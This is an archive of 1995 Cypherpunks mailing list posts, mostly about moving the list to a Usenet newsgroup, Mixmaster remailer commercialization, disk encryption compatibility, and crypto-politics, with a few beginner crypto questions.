>> newsgroup, as mailing lists are a step away from easy access which
>> some people never make.
>
>This sounds like a very good idea to me, since I find the flood of
>e-mail from CP, much of it non-crypto-related, to be annoying. If
>this traffic were in a newsgroup, it would travel compressed over
>my phone line, and I might use a killfile on stuff like the CO$ thread.
>
>Anything posted to the main cypherpunks mailing list and the spun-off mailing
>lists (steganography, remailers, nym servers, etc) could be posted to the
>newsgroup by making one of the mail2news gateways a subscriber.

That was my thinking exactly.  That's why I wrote just such a mail2news
gateway to a local newsgroup, csc.lists.cypherpunks (moderated, with
cypherpunks@toad.com as the moderator), as you can probably see in
the header.

This way, trn groups all articles with the same subject together,
and correctly threads articles that have References: or In-Reply-To:
headers.

As for the location, I'd agree with comp.security.cypherpunks.

Watch out, though; the list/group will probably get a much higher
readership as a newsgroup.  Although this is good for the
"make the public aware" goal, remember that, as far as I can tell,
September 1992 never ended.

I've been very impressed with the signal/noise ratio on this list.
In fact, people often put [NOISE] in the subject line to flag trivial
content.  This ratio will certainly go down if we go to a newsgroup.

One of the main benefits of Usenet is that anyone can _post_.
One of the main detriments is that _anyone_ can post.

   - Ian "that would have been much more elegant in Latin"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dsc@swcp.com)
Date: Wed, 20 Sep 95 17:27:35 PDT
To: cypherpunks@toad.com
Subject: (NOISE) X-FILES ANARCHIST
Message-ID: <9509201552126919@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sat, 16 Sep 1995 09:56:59 -0600
To: cypherpunks@toad.com
From: dsc@swcp.com (Dar Scott)
Subject: (Noise) X-Files anarchist

I hardly watch TV ...blah, blah..., but I saw X-files last night.  A very
minor character was a cryptohacker who--to his surprise--brute-forced a
military key for some files.  He was described as an anarchist.

To _my_ surprise, this anarchist was not associated with violence or
lunatic ravings.  He was shown as reading a book entitled something like
Survey of Modern Conspiracy Theories.  I see this as an improvement in the
stereotype of computer-associated anarchists.  And this I see as a good
thing, since I think there is a lot that could be learned from anarchists.


I think the character was killed, but I may have missed something.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sat, 16 Sep 95 09:22:27 PDT
To: dlv@bwalk.dm.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <15408.9509161506@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri Vulis <dlv@bwalk.dm.com> writes:
> Anything posted to the main cypherpunks mailing list and the
> spun-off mailing lists (steganography, remailers, nym servers, etc)
> could be posted to the newsgroup by making one of the mail2news
> gateways a subscriber.

Not sure that would be a good idea, then the news group would *be*
cypherpunks, and the cypherpunks list would have effectively become a
USENET newsgroup (albeit with some mail2news stuff behind).  For me
part of the fun of cypherpunks is that things get discussed here which
don't get discussed anywhere else, things happen here 1st, rc4 leak,
that kind of thing, if it's happening crypto wise, it's on
cypherpunks.

You might lose some of the community feel to it if it was gated
straight to a USENET group, I mean at that point the majordomo list
server would have become a news2mail gateway.

I was thinking more that you would have a separate newsgroup, but
perhaps my feelings are more of the elitist stuff Peter was referring
to, still I see no need to change a good thing, can't the two co-exist
separately, Peter's stated aims didn't co-incide with my perception of
the cypherpunks list's goals.  ie the list (modulo cpunks write code
wars) seems to me to be about people who share the common goal of free
crypto for everyone, discussing how to go about this, writing code to
help it happen, and analysis of what the government is up to where it
infringes on cypherpunk goals.  I think Peter's goals sounded more
amenable to a forum which was a) easily accessible, and b) had a
stated aim of a kind of cypherpunk technology transfer forum.

Perhaps I am being elitist, so shoot me, but I like cypherpunks the
list the way it is!

For your convenience reading cpunks there are a couple of solutions to
the deluge of mail problem: there used to be a nntp server at
nntp.hks.net which nntp served cypherpunks as a newsgroup (I haven't
used this in a while as it appeared to be down or empty or something
for a while), there are filters which you can set up to put all cpunks
traffic in a separate mbox, and there are a couple of digest forms of
cpunks around also.  The filter won't help your down load time, the
digest (I think Hal offers / was offering an encrypted digest which
would also be compressed) and the nntp server might.

> > Reckon cypherpunks as a group has enough readers to hmm, push through
> > a vote for group creation, if the majority thought it was a useful
> > exercise.  A group solely for what?  cypherpunks technology, social
> 
> No vote is needed to create an alt.group: something like
> 'alt.security.cypherpunks' or 'alt.privacy.cypherpunks'. Just post a proposal
> to alt.config, post many articles seconding the proposal, let it be discussed
> for a week, then issue a newgroup.

Me, I quite like the cypherpunk name, I reckon it would be best from a
distribution pov to get a big8 group, as you discuss.

> To create a newsgroup in the 'big 8' (comp., sci., etc) one needs to
> deal with unpleasant control freaks like group-advice, news.groups,
> and David Lawrence.  It takes up to 6 months. On the other hand,
> many sites that have Usenet have comp.* but not alt.*. Their users
> would still have to use the mailing lists or find another site. To
> create something like comp.security.cypherpunks (I think this would
> be the most appropriate place, since there's already c.s.announce,
> c.s.misc, and c.s.firewalls), talk to the group-advice cabal.

I'll let other people argue about newsgroup names.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@nntp.com>
Date: Sat, 16 Sep 95 13:09:22 PDT
To: remailer-operators@c2.org
Subject: RE: Commercial Mixmaster
Message-ID: <199509162008.QAA06266@nntp.com>
MIME-Version: 1.0
Content-Type: text/plain


>The concern is not "commercialization", per se, but rather the use
>of "commercialization" as an excuse to build in "proprietary"
>features (Back doors?) for which no corresponding source code is
>involved.
>
>Since no one has made a good case for there even being a COMMERCIAL
>market for Mixmaster, could there be other motives?  ...
>
>No, I'm not accusing Lance.  But if he no longer has the time to
>support Mixmaster, then perhaps some other crypto-friendly group
>should take over the task and keep it an OPEN system, with source
>code available.  In fact, even freezing Mixmaster as is would be
>preferable to "improvements" that people don't/can't trust.

This doesn't make sense.

Someone wants to commercialize Mixmaster.  You don't know who it is,
but since you can't see how to make money doing this, you suspect
their motives.  Yet on the other hand, you think they will be so
successful that enough people will buy binary-only servers such that
backdoors are a real threat, perhaps by forcing people to upgrade
or otherwise breaking interoperability with the current free-source
remailer network.

You can't have it both ways.

But even if you could, there's a solution. :)  Download the source
and start releasing "blender", a free-source anonymous remail system
that is upwardly compatible, *and based on* the current Mixmaster.
	/r$
s




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Sat, 16 Sep 95 14:44:19 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: AOL monitoring
In-Reply-To: <199509162055.NAA22204@netcom3.netcom.com>
Message-ID: <Pine.BSD.3.91.950916164152.24414C-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the kewl.rad.tip

Love Always,

Carol Anne

On Sat, 16 Sep 1995, Vladimir Z. Nuri wrote:

> hello, apparently the recent FBI sting happened with the cooperation
> of AOL, which allowed the FBI to monitor downloads..
> 
> here's some info to test if you are being monitored on AOL

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: darkness@darkness.vnet.net
Date: Sat, 16 Sep 95 13:55:25 PDT
To: cypherpunks@toad.com
Subject: Re: SecureDrive News - Win95 yes, Iomega zip drive no
In-Reply-To: <199509162013.NAA06723@desiree.teleport.com>
Message-ID: <199509162056.QAA03317@darkness.vnet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Sat, 16 Sep 1995 13:13:49 -0700
>From: Alan Olsen <alano@teleport.com>
>
>At 02:33 AM 9/16/95 PDT, you wrote:
>
>>I'm sorry to report that SecureDrive does not support the Iomega ZIP
>>drive.  I believe that's because the TSR driver supplied with the
>>hardware does not support a DiskBIOS interface.
>>
>>I had thought that Secure Device, another real-time encryption system,
>>would support this drive, since it works through a device driver
>>mapped to a dos file.  But an actual trial proved otherwise.  The
>>problem is that the DOS file must be present when the CONFIG.SYS
>>DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
>>driver is a TSR that doesn't get loaded until after all DEVICE
>>statements have been processed.
[...]

	Have you tried an 'INSTALL=' line in the CONFIG.SYS to load
the drive's TSR first?  INSTALL is a rarely-documented feature for the
CONFIG.SYS to load a TSR during its processing.  I believe it also
saves memory by not loading some sort of header into memory (DOS
PSP maybe?), which may also cause a problem.  Can't hurt to try
though, eh?

darky
- --
============================================+================================
darkness (darky)   || keys under 'darkness' | 596F7527766520676F742061206672
PGP mail preferred || Key on public servers | 69656E6420696E204269672042726F
     email: darkness@darkness.vnet.net      | 746865722053656375726974792E0A
KeyID: D7E4CA65 / PGPprint = 43 1A 4A 36 4E 79 55 40  04 A1 CA F0 B9 BC 45 86


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFs6EpaAhnnX5MplAQGCUQP9Fb2oUikx9qEHJXBb4nZHtTjZewwn9FZt
UZFxAf42IOyCFKxayanJTkwWkJQqDvetg1P0wvOrK+IRWxvmfvxze/pXQBrGAaqS
oKGdhW0C5Wjol2ffgATh0K3a3ztd/klRd0dySQMISxz/DTcqvTxtW5n7+965VJT+
5akW4nJL558=
=YrYU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Sat, 16 Sep 95 14:14:07 PDT
To: cypherpunks@toad.com
Subject: Rosing's Elliptic curve documentation question
Message-ID: <199509162113.AA09748@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


I was reading Mike Rosing's documentation for his elliptic curve
system from the Cypherpunks FTP site.  In it, he uses the notation:
sum a_i*b^2^i
	Now, like a good little Calculus 2 student, I assumed this must be a
regular summation.  But if so, which is the index of summation, and
what are the bounds of summation?  Someone want to give me a clue as
to what this notation means?
						Dan Bailey
***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rshea@netcom.com (rex)
Date: Sat, 16 Sep 95 20:00:16 PDT
To: cypherpunks@toad.com
Subject: cypherpunks as a newsgroup
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <Gt2WwMNwPV6f084yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <43f97c$64n@calum.csclub.uwaterloo.ca>, you wrote:
>Dr. Dimitri Vulis <dlv@bwalk.dm.com> wrote:
>>
>>Anything posted to the main cypherpunks mailing list and the spun-off mailing
>>lists (steganography, remailers, nym servers, etc) could be posted to the
>>newsgroup by making one of the mail2news gateways a subscriber.
>
>That was my thinking exactly.  That's why I wrote just such a mail2news
>gateway to a local newsgroup, csc.lists.cypherpunks (moderated, with
>cypherpunks@toad.com as the moderator), as you can probably see in
>the header.
>
>This way, trn groups all articles with the same subject together,
>and correctly threads articles that have References: or In-Reply-To:
>headers.

Some readers may not know they can use Yarn/UQWK under DOS or OS/2 to
read this list as if it were a newsgroup.  Yarn has Filters which can
be used to move email from various lists to pseudo-newsgroups, and the
threading, References, etc, work nicely.  PGP signing/encryption is a
menu choice. A hook for a MIME processor is provided. Trn filters may
be used to filter the real newsgroups before the mail and news is
packed into a SOUP packet by UQWK.

There is a Yarn list: yarn-list@lists.colorado.edu

More info: http://www.nic.com/~cannon/handson.html

- -rex


-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCVAgUBMFt0+W8sjl9sYg/JAQF83AP7BgfWOaiAZQc+3A2UPQ8ej8GgdqyaUbKc
vqmVUldOp9WrRsP9LZUxgW8MWd0FfWFKOpttlvfPdsrmU1CPcb9G+Qh8dc05iEIW
CFBTDo2z6F8qcEtS0gnG0SGEjIvSEMAxOvurTs5qfGhSgcBnbPdpmTMgElOIJCeO
hqiM+jGFd1E=
=U+24
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 14:44:32 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: cypherpunks as a newsgroup
In-Reply-To: <199509162041.NAA10780@desiree.teleport.com>
Message-ID: <Pine.SUN.3.91.950916174240.1443A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 16 Sep 1995, Alan Olsen wrote:


> I have a group of friends who get forwarded the "best" of the Cypherpunks
> list.  The signal to noise ratio is high enough that I have to be careful
> how much I forward lest I get complaints at the volume of what I forward.
> Turning this into an alt group would destroy that.


I don't understand this tendency to want to TURN the list into anything.

Leave the list, and start an alt.* group if you like.

I prefer the list, but will look at the group from time to time.

Why must this be an either/or choice?


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 16 Sep 95 15:53:31 PDT
To: cypherpunks@toad.com
Subject: Look, a *.cypherpunk group already exists!
Message-ID: <199509162253.PAA26158@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Over here at Primenet, there is a newsgroup called
mail.cyperpunks. It came in as a newgroup a couple
of weeks ago. New articles posted to it make the list.

I'm amazed we haven't been commercially spammed yet!

But it's there already. Just in the mail hierarchy, that's all.

alt.cypherpunks? ohmigawd! Sheesh!

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 16 Sep 95 16:54:06 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <9509161930.AA08524@spirit.aud.alcatel.com>
Message-ID: <199509162353.RAA06965@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Several people are working on improvements to netnews which allow more active
filtering.  The most promising techniques that I have heard about involve a
lot of "ratings" being generated by readers and then taken into account by
other readers when filtering/sorting the articles.


I am perfectly happy with the social scene on the cypherpunks list as is, and
I think those who want to move to a newsgroup don't know what they are asking
for.  (Go read sci.crypt and talk.politics.crypto for awhile.  I expect an
"alt.cypherpunks" would be indistinguishable from those two in short order.)


BUT, I was thinking that this group (I mean, this group of people) would make
an excellent group to test this new technology.  Think about it:  Perry
Metzger could routinely give conspiracy articles/authors a "-10" rating, and
those of us who agreed with him could set our "Perry coefficients" to
indicate the degree to which we agree with his evaluations.  Thus we might
actually gain a *higher* SNR by moving to UseNet.  (And it would provide an
exciting example of reputations in action...)


I don't know if the technology is there yet, or if it is accessible to most
of our readers.  One person who is working on such a scheme is "(cm)", or 
"na48985@anon.penet.fi".  I have added his name to the Cc: line so perhaps he
would be so kind as to tell us about his "NoCeM" ("No see 'em!") software.


Bryce

signatures follow:


                                    +                                        
      public key on keyservers      /.      island Life in a chaos sea       
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu    
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

iQCVAwUBMFtjUvWZSllhfG25AQHSoAP/aH1kzLO+JYzlPqdAA9Zeb7JpeWbt4xEI
WH0HCP+sjEFgsW/sXpEpjT5TuMe3/FyGAJFZTN0l8SLythYuFJauGs5xf2tEv8OQ
3q5jTq4pztMbvD9FnlFeU4kfcg5yJkvy9KDebfxtRAfDvIz6BTxGuNkJ18rJBXlY
OCg+mm8vYmc=
=paQk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 16 Sep 95 18:29:34 PDT
To: mix-l@jpunix.com
Subject: Re: Mixmaster status changing
Message-ID: <199509170127.SAA20213@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:04 PM 9/14/95 -0700, Lance Cottrell wrote:
>There has been an offer to purchase and commercially develop Mixmaster.
>This will hasten the development of Mixmaster for other platforms (e.g.
>Dos, Windows, Macintosh), and bring significant improvements to the
>interface, but I will not compromise on the level of security provided by
>Mixmaster. Free client software will continue to be available.

This is great, but of course what we urgently need is a free windows
client.

What is the score on this?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sat, 16 Sep 95 16:31:02 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID: <Pine.OSF.3.91.950916182959.29773A-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Check out the newest issue of Scientific American.

Dan


On Fri, 15 Sep 1995, Jeff Simmons wrote:

> Could anyone point me to information on 'quantum' computing?
> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 16 Sep 95 10:53:11 PDT
To: hallam@w3.org
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <Pine.3.89.9509161836.A25771-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Sep 1995 hallam@w3.org wrote:

> One thought to ponder on. There is no real difference in terms of resources 
> required between a mailing list and an archive of a mailing list at a Web 
> site. The latter does avoid a large number of unnecessary dispatches however.

However:

a) You can't read it through a remailer (yet).

b) Anyone watching the site can tell which threads you're interested in, 
and thereby determine what your real interests in this group are.

c) It cuts off anyone who doesn't have direct net access, or can't afford 
long telephone calls. It's a lot cheaper to download a day's mail in one 
go than to spend three hours browsing a WWW site.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sat, 16 Sep 95 04:45:56 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID: <Pine.LNX.3.91.950916190030.5451A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Sep 1995, Jeff Simmons wrote:

> Could anyone point me to information on 'quantum' computing?

Two good starting points are:

 http://vesta.physics.ucla.edu/~smolin/index.html

and, in Oxford:

 http://eve.physics.ox.ac.uk/QChome.html

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 16 Sep 95 11:20:08 PDT
To: Alan Barrett <barrett@iafrica.com>
Subject: Re: [NOISE] Re: Linking = Showing = Transferring?
In-Reply-To: <v01510101ac7e7081b71f@[198.59.115.134]>
Message-ID: <9509161819.AA08057@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Alan Barrett writes:
 > > I wonder if I have a pornopage.
 > Of course you do (assuming the stupid transitive definition of a
 > pornopage). 

 > Start at your home page
[...]
One could define some kind of new metric: let dp(x) be the shortest number of
hops to go from page x to any "porn" (sexy) page.
Now, I bet that dp(x) < infinity for any page x that has links on
their site that go outside their site, thanks to the "strange
attractor" represented by search engines & indexes, which are the most
linked pages.

<dp(x)> (mean dp) is prolly around 4 or 5

For instance, what is the pornography distance of whitehouse ? 
Without complete search, their dp(http://www.whitehouse.gov/)<=7 :

-> textual representation of this page.  {sorry, i had to go there,using lynx}
http://www.whitehouse.gov/White_House/html/White_House_Home-plain.html
-> Executive Branch
(http://www.whitehouse.gov/White_House/EOP/html/3_parts-plain.html)
-> government information locator service (GILS)
(http://info.er.usgs.gov/gils/index.htm)
-> IMAGINATION NEEDED HERE!
(http://www.usgs.gov/public/gils/imagine.html)
-> [Other Topics]   {lots of remote pointers, but lots of outdated links too}
(http://www.usgs.gov/public/gils/other.html)
-> Another List of Internet Search facilities {netscape's search page}
(http://home.mcom.com/home/internet-search.html)
Search for "playboy" for instance at infoseek, or anything in
fact... (btw where is that fast playboy's mirror ?)
-> sexy pages!

Regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 20:28:47 PDT
To: Greg Broiles <cypherpunks@toad.com
Subject: [ASSENT NOISE] Re: C-punks, marketing for the masses
Message-ID: <ac80e18f18021004beea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:08 PM 9/16/95, Greg Broiles wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>No disrespect intended, but I think that the various "let's sanitize
>the Cypherpunk message for mass acceptance" marketing/soundbite
>proposals are pointless. Cypherpunks is a mailing list, not a political
>party (or a platform).
>
>- From my perspective, the organizing meme for the list is not "strong
>crypto is really important, so let's write some and lobby our lawmakers
>to make sure it stays legal" but "strong crypto is here and is changing
>the dynamics of force, politics, and power, so let's see what we can
>do with it."

Hear, hear! Greg is absolutely right.

(And Dave Mandl was, too, about our mailing list not being a corporation
trying to increase market share.)

I applaud the efforts to lobby Congresscritters to vote in ways we would
find desirable (though I note with some irony that the Congressman who has
come out most strongly _against_ Net censorship is Newt Gingrich, often
demonized by many. To the credit of EFF and EPIC, and others of that ilk,
they noted this fact.)

But as Greg points out, we are not a political party. More to the point, we
have no centralized resources, no staff, no travel budgets, no ability to
appoint spokespunks to speak to the media. This is a weakness, and a
strength.

I think it was Bill Stewart who noted that the "conventional" cyberspace
lobbying groups, such as EFF, EPIC, CPSR, etc., are largely
"director-driven," with a handful (or just one or two) directors making
decisions, speaking publicly, and getting all the attention.

The Cypherpunks group is not like that. Lacking any formalized leadership,
and--most importantly--lacking offices in D.C., we can't be asked to
perform like the usual trained seals who produce the soundbites that fit
into the stories too many reporters want. Again, a weakness and a strength.

I sense in the debate here that some of us want to have more of an impact,
more of a political impact. The cynic in me says these people have just not
been in the game long enough to become realists (to a cynic, cynicism is
realism).

>(And no, I don't think it's important to spread that "meme" (a term
>I use with some trepidation) around to get "market share" for it.
>Ideas are not football teams nor initiative proposals.)
>
>I appreciate and support and have participated in various write-yer-
>legislator activities. They're useful short-term. But if Tim May and
>Duncan Frissell and the other list members who've dared to make predictions
>about the impact of crypto on government and economics are correct,
>what the government and the legislators want doesn't matter. If they're
>wrong, what we want doesn't matter.

I suppose it is mainly Duncan and I that make these points, with
contributions also from Sandy Sandfort, Black Unicorn, Lucky Green, and
others (sorry if I've left you out of the Crypto Anarchy Hall of
Shame^H^H^H^H^H Fame).

Please understand that I am not elitist in the sense of wishing to limit
access to ideas many of us espouse. I discourage no one from calling in to
radio talk shows, from writing articles, and so on.

But I'm not convinced that "political action" matters very much. As Greg
puts it, if we're right, politics won't matter. And if we're wrong,
politics won't matter.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Sat, 16 Sep 95 17:40:41 PDT
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <ac80d4a51e02100402b9@[199.125.128.5]>
Message-ID: <Pine.3.89.9509162002.A11836-0100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain



>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>is curiosity." 

It may not be a crime, but it's not nice to steal a title.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 16 Sep 95 17:41:19 PDT
To: cypherpunks@toad.com
Subject: Re: (noise) Re: SPAM bait
In-Reply-To: <199509161913.PAA55049@tequesta.gate.net>
Message-ID: <199509170041.CAA29649@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> What I don't understand about inappropriate SPAMs like that one
> (or telephone ads) is; what's the business incentive to do it?
> I assume that no Cypherpunk has subscribed to "Janet's" magazines,
> and I know that no Ray has _EVER_ spent money over a telephone
> unless we initiated the call, yet *still* we get unwanted calls
> every once-in-a-while. WHY?

Well, that may be true, but I'd suspect that the average IQ on this
list is significantly higher than the net at large.  So if you spammed
enough newsgroups, chances are that you'd find a sucker somewhere.

Even tho it is becoming more common for marketing firms to keep
databases of who buys (or doesn't buy) what, I suspect that a lot of
calling is still done at random (the local newspaper still calls us
even tho we have subscribed for years and told them several times that
they are wasting their time calling.  So I suspect it is just done at
random.)

These days, many telemarketers have autodialers that call ahead and then
connect a salesman after you have answered the phone.  So if I get a call,
say hello, and hear silence and then a click of being transferred to the
next available salesperson, that is my cue to hang up.

> [Please respond privately to liberty@gate.net ]

uh, well at least this post is labelled 'noise' for the mailfilters...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 20:41:15 PDT
To: Childers James <cypherpunks@toad.com
Subject: Re: Newbie Crypto question: MOD?
Message-ID: <ac80e66d19021004e38b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:39 PM 9/16/95, Childers James wrote:
>Ok folks, I recently received "Applied Cryptography" as a gift, and just
>have one question: How does the MOD function work in crypto functions? It
>seems to work differently than what I've seen before, i.e.: C/C++ MOD. I
>also didn't see anything in TCM's FAQ...
>
>If this is considered noise, I apologize in advance.

I didn't put anything in my FAQ about "mod" because my FAQ was not a crypto
FAQ per se, of which there are at least two. (Cf. sci.crypt for regular
pointers.)

And I doubt that either of these FAQs discusses the mod function, though I
haven't checked.

In any case, Schneier devotes several pages to mod, starting with "You all
learned modular arithmetic in school; it was called "clock arithmetic"" (p.
198).

After defining it, Schneier goes on to discuss its use in modern cryptography.

If this isn't enough of an explanation, I don't know what more to say.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date: Sat, 16 Sep 95 13:10:51 PDT
To: cypherpunks@toad.com
Subject: More on ECheques
Message-ID: <1995-Sep16-205309.1>
MIME-Version: 1.0
Content-Type: text/plain


unicorn@polaris.mindport.net wrote:
>> 1. I was not suggesting that you put your real bank account number
>>     in the program.  A test number is perfectly adequate.

>(But I will clone some checks and drain your account quickly).

Really ..... how.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 16 Sep 95 12:30:10 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <9509151114.AA07872@sulphur.osf.org>
Message-ID: <9509161929.AA08458@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz writes:
 > Inline images are not references -- they are part of the page being
 > retrieved.  
I don't agree...
 > >	<img src="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">
 > >So that the image is *imported* by the *viewer*, and not supplied by
 > >www.obscura.
indeed
 > Inlined images are just a convenient way of chunking.  The image is imported
 > by the viewer because the server, as part of the base document, told it
 > to do so.  You might be able to fool an ignorant court, but it still
 > doesn't change the fact that Lance has a document that in the natural
 > course of operation of the Web, exports crypto.
                                   *******
[...]
Oh ? exports from Uk to Uk for instance  ??
how could it export anything without any packet crossing a "border"
even virtual ?

